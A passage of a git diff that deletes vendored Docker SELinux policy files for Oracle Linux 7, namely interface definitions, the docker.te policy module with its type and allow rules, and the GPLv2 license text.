-## -## -# -interface(`docker_typebounds',` - gen_require(` - type docker_t; - ') - - typebounds docker_t $1; -') - -######################################## -## -## Allow any docker_exec_t to be an entrypoint of this domain -## -## -## -## Domain allowed access. -## -## -## -# -interface(`docker_entrypoint',` - gen_require(` - type docker_exec_t; - ') - allow $1 docker_exec_t:file entrypoint; -') - -######################################## -## -## Send and receive messages from -## systemd machined over dbus. -## -## -## -## Domain allowed access. -## -## -# -interface(`systemd_dbus_chat_machined',` - gen_require(` - type systemd_machined_t; - class dbus send_msg; - ') - - allow $1 systemd_machined_t:dbus send_msg; - allow systemd_machined_t $1:dbus send_msg; - ps_process_pattern(systemd_machined_t, $1) -') - -######################################## -## -## Allow any svirt_sandbox_file_t to be an entrypoint of this domain -## -## -## -## Domain allowed access. -## -## -## -# -interface(`virt_sandbox_entrypoint',` - gen_require(` - type svirt_sandbox_file_t; - ') - allow $1 svirt_sandbox_file_t:file entrypoint; -') - -######################################## -## -## Send and receive messages from -## virt over dbus. -## -## -## -## Domain allowed access. -## -## -# -interface(`virt_dbus_chat',` - gen_require(` - type virtd_t; - class dbus send_msg; - ') - - allow $1 virtd_t:dbus send_msg; - allow virtd_t $1:dbus send_msg; - ps_process_pattern(virtd_t, $1) -') - -####################################### -## -## Read the process state of virt sandbox containers -## -## -## -## Domain allowed access. -## -## -# -interface(`virt_sandbox_read_state',` - gen_require(` - attribute svirt_sandbox_domain; - ') - - ps_process_pattern($1, svirt_sandbox_domain) -') - -###################################### -## -## Send a signal to sandbox domains -## -## -## -## Domain allowed access. 
-## -## -# -interface(`virt_signal_sandbox',` - gen_require(` - attribute svirt_sandbox_domain; - ') - - allow $1 svirt_sandbox_domain:process signal; -') - -####################################### -## -## Getattr Sandbox File systems -## -## -## -## Domain allowed access. -## -## -# -interface(`virt_getattr_sandbox_filesystem',` - gen_require(` - type svirt_sandbox_file_t; - ') - - allow $1 svirt_sandbox_file_t:filesystem getattr; -') - -####################################### -## -## Read Sandbox Files -## -## -## -## Domain allowed access. -## -## -# -interface(`virt_read_sandbox_files',` - gen_require(` - type svirt_sandbox_file_t; - ') - - list_dirs_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) - read_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) - read_lnk_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) -') - -####################################### -## -## Read the process state of spc containers -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_spc_read_state',` - gen_require(` - type spc_t; - ') - - ps_process_pattern($1, spc_t) -') - diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te deleted file mode 100644 index d4de36fe46..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te +++ /dev/null @@ -1,465 +0,0 @@ -policy_module(docker, 1.0.0) - -######################################## -# -# Declarations -# - -## -##

-## Determine whether docker can -## connect to all TCP ports. -##

-##
-gen_tunable(docker_connect_any, false) - -type docker_t; -type docker_exec_t; -init_daemon_domain(docker_t, docker_exec_t) -domain_subj_id_change_exemption(docker_t) -domain_role_change_exemption(docker_t) - -type spc_t; -domain_type(spc_t) -role system_r types spc_t; - -type docker_auth_t; -type docker_auth_exec_t; -init_daemon_domain(docker_auth_t, docker_auth_exec_t) - -type spc_var_run_t; -files_pid_file(spc_var_run_t) - -type docker_var_lib_t; -files_type(docker_var_lib_t) - -type docker_home_t; -userdom_user_home_content(docker_home_t) - -type docker_config_t; -files_config_file(docker_config_t) - -type docker_lock_t; -files_lock_file(docker_lock_t) - -type docker_log_t; -logging_log_file(docker_log_t) - -type docker_tmp_t; -files_tmp_file(docker_tmp_t) - -type docker_tmpfs_t; -files_tmpfs_file(docker_tmpfs_t) - -type docker_var_run_t; -files_pid_file(docker_var_run_t) - -type docker_plugin_var_run_t; -files_pid_file(docker_plugin_var_run_t) - -type docker_unit_file_t; -systemd_unit_file(docker_unit_file_t) - -type docker_devpts_t; -term_pty(docker_devpts_t) - -type docker_share_t; -files_type(docker_share_t) - -# OL7 systemd selinux update -type systemd_machined_t; -type systemd_machined_exec_t; -init_daemon_domain(systemd_machined_t, systemd_machined_exec_t) - -# /run/systemd/machines -type systemd_machined_var_run_t; -files_pid_file(systemd_machined_var_run_t) - -# /var/lib/machines -type systemd_machined_var_lib_t; -files_type(systemd_machined_var_lib_t) - - -######################################## -# -# docker local policy -# -allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; -allow docker_t self:tun_socket relabelto; -allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; -allow docker_t self:fifo_file rw_fifo_file_perms; -allow docker_t self:unix_stream_socket create_stream_socket_perms; -allow docker_t self:tcp_socket create_stream_socket_perms; -allow docker_t 
self:udp_socket create_socket_perms; -allow docker_t self:capability2 block_suspend; - -docker_auth_stream_connect(docker_t) - -manage_files_pattern(docker_t, docker_home_t, docker_home_t) -manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) -manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) -userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") - -manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) -manage_files_pattern(docker_t, docker_config_t, docker_config_t) -files_etc_filetrans(docker_t, docker_config_t, dir, "docker") - -manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) -manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) -files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc") - -manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) -manage_files_pattern(docker_t, docker_log_t, docker_log_t) -manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) -logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) -allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; - -manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -allow docker_t docker_tmpfs_t:dir relabelfrom; -can_exec(docker_t, docker_tmpfs_t) -fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) -allow docker_t docker_tmpfs_t:chr_file mounton; - -manage_dirs_pattern(docker_t, 
docker_share_t, docker_share_t) -manage_files_pattern(docker_t, docker_share_t, docker_share_t) -manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) -allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; - -can_exec(docker_t, docker_share_t) -#docker_filetrans_named_content(docker_t) - -manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; -files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) - -allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; -term_create_pty(docker_t, docker_devpts_t) - -kernel_read_system_state(docker_t) -kernel_read_network_state(docker_t) -kernel_read_all_sysctls(docker_t) -kernel_rw_net_sysctls(docker_t) -kernel_setsched(docker_t) -kernel_read_all_proc(docker_t) - -domain_use_interactive_fds(docker_t) -domain_dontaudit_read_all_domains_state(docker_t) - -corecmd_exec_bin(docker_t) -corecmd_exec_shell(docker_t) - -corenet_tcp_bind_generic_node(docker_t) -corenet_tcp_sendrecv_generic_if(docker_t) -corenet_tcp_sendrecv_generic_node(docker_t) -corenet_tcp_sendrecv_generic_port(docker_t) -corenet_tcp_bind_all_ports(docker_t) -corenet_tcp_connect_http_port(docker_t) -corenet_tcp_connect_commplex_main_port(docker_t) 
-corenet_udp_sendrecv_generic_if(docker_t) -corenet_udp_sendrecv_generic_node(docker_t) -corenet_udp_sendrecv_all_ports(docker_t) -corenet_udp_bind_generic_node(docker_t) -corenet_udp_bind_all_ports(docker_t) - -files_read_config_files(docker_t) -files_dontaudit_getattr_all_dirs(docker_t) -files_dontaudit_getattr_all_files(docker_t) - -fs_read_cgroup_files(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_search_all(docker_t) -fs_getattr_all_fs(docker_t) - -storage_raw_rw_fixed_disk(docker_t) - -auth_use_nsswitch(docker_t) -auth_dontaudit_getattr_shadow(docker_t) - -init_read_state(docker_t) -init_status(docker_t) - -logging_send_audit_msgs(docker_t) -logging_send_syslog_msg(docker_t) - -miscfiles_read_localization(docker_t) - -mount_domtrans(docker_t) - -seutil_read_default_contexts(docker_t) -seutil_read_config(docker_t) - -sysnet_dns_name_resolve(docker_t) -sysnet_exec_ifconfig(docker_t) - -optional_policy(` - rpm_exec(docker_t) - rpm_read_db(docker_t) - rpm_exec(docker_t) -') - -optional_policy(` - fstools_domtrans(docker_t) -') - -optional_policy(` - iptables_domtrans(docker_t) -') - -optional_policy(` - openvswitch_stream_connect(docker_t) -') - -# -# lxc rules -# - -allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; - -allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; - -allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; -allow docker_t self:netlink_audit_socket create_netlink_socket_perms; -allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; -allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; - -allow docker_t docker_var_lib_t:dir mounton; -allow docker_t docker_var_lib_t:chr_file mounton; -can_exec(docker_t, docker_var_lib_t) - -kernel_dontaudit_setsched(docker_t) -kernel_get_sysvipc_info(docker_t) -kernel_request_load_module(docker_t) -kernel_mounton_messages(docker_t) 
-kernel_mounton_all_proc(docker_t) -kernel_mounton_all_sysctls(docker_t) -kernel_unlabeled_entry_type(spc_t) -kernel_unlabeled_domtrans(docker_t, spc_t) - -dev_getattr_all(docker_t) -dev_getattr_sysfs_fs(docker_t) -dev_read_urand(docker_t) -dev_read_lvm_control(docker_t) -dev_rw_sysfs(docker_t) -dev_rw_loop_control(docker_t) -dev_rw_lvm_control(docker_t) - -files_getattr_isid_type_dirs(docker_t) -files_manage_isid_type_dirs(docker_t) -files_manage_isid_type_files(docker_t) -files_manage_isid_type_symlinks(docker_t) -files_manage_isid_type_chr_files(docker_t) -files_manage_isid_type_blk_files(docker_t) -files_exec_isid_files(docker_t) -files_mounton_isid(docker_t) -files_mounton_non_security(docker_t) -files_mounton_isid_type_chr_file(docker_t) - -fs_mount_all_fs(docker_t) -fs_unmount_all_fs(docker_t) -fs_remount_all_fs(docker_t) -files_mounton_isid(docker_t) -fs_manage_cgroup_dirs(docker_t) -fs_manage_cgroup_files(docker_t) -fs_relabelfrom_xattr_fs(docker_t) -fs_relabelfrom_tmpfs(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_list_hugetlbfs(docker_t) - -term_use_generic_ptys(docker_t) -term_use_ptmx(docker_t) -term_getattr_pty_fs(docker_t) -term_relabel_pty_fs(docker_t) -term_mounton_unallocated_ttys(docker_t) - -modutils_domtrans_insmod(docker_t) - -systemd_status_all_unit_files(docker_t) -systemd_start_systemd_services(docker_t) - -userdom_stream_connect(docker_t) -userdom_search_user_home_content(docker_t) -userdom_read_all_users_state(docker_t) -userdom_relabel_user_home_files(docker_t) -userdom_relabel_user_tmp_files(docker_t) -userdom_relabel_user_tmp_dirs(docker_t) - -optional_policy(` - gpm_getattr_gpmctl(docker_t) -') - -optional_policy(` - dbus_system_bus_client(docker_t) - init_dbus_chat(docker_t) - init_start_transient_unit(docker_t) - - optional_policy(` - systemd_dbus_chat_logind(docker_t) - systemd_dbus_chat_machined(docker_t) - ') - - optional_policy(` - firewalld_dbus_chat(docker_t) - ') -') - -optional_policy(` - udev_read_db(docker_t) -') - 
-optional_policy(` - unconfined_domain(docker_t) - # unconfined_typebounds(docker_t) -') - -optional_policy(` - virt_read_config(docker_t) - virt_exec(docker_t) - virt_stream_connect(docker_t) - virt_stream_connect_sandbox(docker_t) - virt_exec_sandbox_files(docker_t) - virt_manage_sandbox_files(docker_t) - virt_relabel_sandbox_filesystem(docker_t) - # for lxc - virt_transition_svirt_sandbox(docker_t, system_r) - virt_mounton_sandbox_file(docker_t) -# virt_attach_sandbox_tun_iface(docker_t) - allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; - virt_sandbox_entrypoint(docker_t) -') - -tunable_policy(`docker_connect_any',` - corenet_tcp_connect_all_ports(docker_t) - corenet_sendrecv_all_packets(docker_t) - corenet_tcp_sendrecv_all_ports(docker_t) -') - -######################################## -# -# spc local policy -# -allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint; -role system_r types spc_t; - -domtrans_pattern(docker_t, docker_share_t, spc_t) -domtrans_pattern(docker_t, docker_var_lib_t, spc_t) -allow docker_t spc_t:process { setsched signal_perms }; -ps_process_pattern(docker_t, spc_t) -allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; -filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay") - -optional_policy(` - systemd_dbus_chat_machined(spc_t) -') - -optional_policy(` - dbus_chat_system_bus(spc_t) -') - -optional_policy(` - unconfined_domain_noaudit(spc_t) -') - -optional_policy(` - virt_transition_svirt_sandbox(spc_t, system_r) - virt_sandbox_entrypoint(spc_t) -') - -######################################## -# -# docker_auth local policy -# -allow docker_auth_t self:fifo_file rw_fifo_file_perms; -allow docker_auth_t self:unix_stream_socket create_stream_socket_perms; -dontaudit docker_auth_t self:capability net_admin; - -docker_stream_connect(docker_auth_t) - -manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_files_pattern(docker_auth_t, 
docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file }) - -domain_use_interactive_fds(docker_auth_t) - -kernel_read_net_sysctls(docker_auth_t) - -auth_use_nsswitch(docker_auth_t) - -files_read_etc_files(docker_auth_t) - -miscfiles_read_localization(docker_auth_t) - -sysnet_dns_name_resolve(docker_auth_t) - -######################################## -# -# OL7.2 systemd selinux update -# systemd_machined local policy -# -allow systemd_machined_t self:capability { dac_override setgid sys_admin sys_chroot sys_ptrace }; -allow systemd_machined_t systemd_unit_file_t:service { status start }; -allow systemd_machined_t self:unix_dgram_socket create_socket_perms; - -manage_dirs_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) -manage_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) -manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) -init_pid_filetrans(systemd_machined_t, systemd_machined_var_run_t, dir, "machines") - -manage_dirs_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) -manage_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) -manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) -init_var_lib_filetrans(systemd_machined_t, systemd_machined_var_lib_t, dir, "machines") - -kernel_dgram_send(systemd_machined_t) -# This is a bug, but need for now. 
-kernel_read_unlabeled_state(systemd_machined_t) - -init_dbus_chat(systemd_machined_t) -init_status(systemd_machined_t) - -userdom_dbus_send_all_users(systemd_machined_t) - -term_use_ptmx(systemd_machined_t) - -optional_policy(` - dbus_connect_system_bus(systemd_machined_t) - dbus_system_bus_client(systemd_machined_t) -') - -optional_policy(` - docker_read_share_files(systemd_machined_t) - docker_spc_read_state(systemd_machined_t) -') - -optional_policy(` - virt_dbus_chat(systemd_machined_t) - virt_sandbox_read_state(systemd_machined_t) - virt_signal_sandbox(systemd_machined_t) - virt_stream_connect_sandbox(systemd_machined_t) - virt_rw_svirt_dev(systemd_machined_t) - virt_getattr_sandbox_filesystem(systemd_machined_t) - virt_read_sandbox_files(systemd_machined_t) -') - - diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE deleted file mode 100644 index 5b6e7c66c2..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE +++ /dev/null @@ -1,340 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc. - 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Library General Public License instead.) You can apply it to -your programs, too. 
- - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. - - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. 
- - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. 
You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. - - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. 
- -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. - -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. 
However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. 
-You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. 
If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -convey the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. 
- - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA - - -Also add information on how to contact you by electronic and paper mail. - -If the program is interactive, make it output a short notice like this -when it starts in an interactive mode: - - Gnomovision version 69, Copyright (C) year name of author - Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, the commands you use may -be called something other than `show w' and `show c'; they could even be -mouse-clicks or menu items--whatever suits your program. - -You should also get your employer (if you work as a programmer) or your -school, if any, to sign a "copyright disclaimer" for the program, if -necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the program - `Gnomovision' (which makes passes at compilers) written by James Hacker. - - , 1 April 1989 - Ty Coon, President of Vice - -This General Public License does not permit incorporating your program into -proprietary programs. If your program is a subroutine library, you may -consider it more useful to permit linking proprietary applications with the -library. If this is what you want to do, use the GNU Library General -Public License instead of this License. 
